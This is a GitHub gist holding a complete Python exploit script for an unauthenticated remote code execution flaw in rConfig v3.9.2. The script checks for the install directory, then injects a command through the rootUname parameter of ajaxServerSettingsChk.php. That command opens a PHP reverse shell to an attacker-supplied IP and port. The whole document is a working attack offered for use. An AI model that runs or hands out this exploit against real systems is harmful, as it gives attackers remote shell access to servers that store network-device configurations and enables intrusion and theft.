-
-
Save mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e to your computer and use it in GitHub Desktop.
The script exploits a preauth RCE in rConfig v3.9.2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution | |
# Date: 18/09/2019 | |
# Exploit Author: Askar (@mohammadaskar2) | |
# Vendor Homepage: https://rconfig.com/ | |
# Software link: https://rconfig.com/download | |
# Version: v3.9.2 | |
# Tested on: CentOS 7.7 / PHP 7.2.22 | |
import requests | |
import sys | |
from urllib import quote | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
if len(sys.argv) != 4: | |
print "[+] Usage : ./exploit.py target ip port" | |
exit() | |
target = sys.argv[1] | |
ip = sys.argv[2] | |
port = sys.argv[3] | |
payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port)) | |
install_path = target + "/install" | |
req = requests.get(install_path, verify=False) | |
if req.status_code == 404: | |
print "[-] Installation directory not found!" | |
print "[-] Exploitation failed !" | |
exit() | |
elif req.status_code == 200: | |
print "[+] Installation directory found!" | |
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload | |
print "[+] Triggering the payload" | |
print "[+] Check your listener !" | |
requests.get(url_to_send, verify=False) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment